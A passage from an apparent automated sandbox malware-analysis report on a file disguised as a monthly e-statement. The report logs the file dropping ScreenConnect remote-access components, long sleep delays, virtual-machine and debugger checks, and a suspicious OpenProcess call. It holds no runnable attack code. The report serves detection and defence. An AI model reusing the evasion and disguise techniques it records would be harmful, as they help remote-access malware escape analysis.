                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3179Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6488Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\XGQ26BMR.JGT\LJ4HY9ZP.N47\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe TID: 5544Thread sleep count: 67 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe TID: 5544Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599653s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599544s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599309s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599188s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -599061s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598813s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598688s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598562s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598451s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598219s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -598108s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597932s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597777s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597665s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597560s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597234s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597124s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -597014s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596905s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596687s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596578s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596468s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596249s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596140s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -596031s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595922s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595812s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595702s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595593s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595474s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595359s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595238s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -595050s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594934s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594609s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594500s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594391s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594281s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 2128Thread sleep time: -594172s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 4760Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe TID: 5772Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe TID: 940Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A4A4B FindFirstFileExA,0_2_009A4A4B
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599653Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599544Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599309Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599061Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598451Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598108Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597932Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597777Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597665Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597014Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595702Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595474Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595238Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595050Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594934Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594172Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000002.00000002.2979497354.0000025D35E86000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2983530978.0000025D396AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3288443325.0000016BA622B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3290214529.0000016BAB855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2261874681.0000021CA1EDB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3288165449.0000021CA1EDC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2120616150.0000021CA1EDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: svchost.exe, 00000007.00000002.3287628866.0000021CA1E41000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000B.00000002.3286846873.0000000001211000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: dfsvc.exe, 00000002.00000002.2983207645.0000025D39609000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWN
                  Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: svchost.exe, 00000007.00000002.3289223236.0000021CA2E42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTVMWare
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009A191F
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_009A1000
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A3677 mov eax, dword ptr fs:[00000030h]0_2_009A3677
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A6893 GetProcessHeap,0_2_009A6893
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009A1493
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009A191F
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A4573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009A4573
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_009A1AAC SetUnhandledExceptionFilter,0_2_009A1AAC
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: ScreenConnect.ClientService.dll.2.dr, ClientService.csReference to suspicious API methods: WindowsExtensions.OpenProcess(processID, (ProcessAccess)33554432)
